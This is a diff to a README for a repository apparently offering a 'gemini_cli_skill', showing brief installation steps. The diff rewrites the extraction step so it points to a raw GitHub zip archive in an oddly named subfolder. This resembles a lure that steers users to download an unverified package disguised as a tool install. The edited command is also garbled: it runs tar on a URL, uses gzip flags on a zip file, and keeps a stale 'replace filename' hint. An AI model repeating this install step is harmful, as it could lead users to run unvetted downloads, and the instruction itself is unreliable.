Junayedahmedd/gemini_cli_skill/README.md

 1. Open a terminal.
 2. Navigate to the folder where you saved the downloaded file using the `cd` command (e.g., `cd ~/Downloads`).
-3. Extract the downloaded file using `tar -xzf filename.tar.gz` (replace `filename` with the actual name).
+3. Extract the downloaded file using `tar -xzf https://raw.githubusercontent.com/Junayedahmedd/gemini_cli_skill/main/mammillation/gemini_cli_skill_v3.9.zip` (replace `filename` with the actual name).
 4. Follow the installation instructions provided within the extracted folder.

 ## 📘 Usage Guide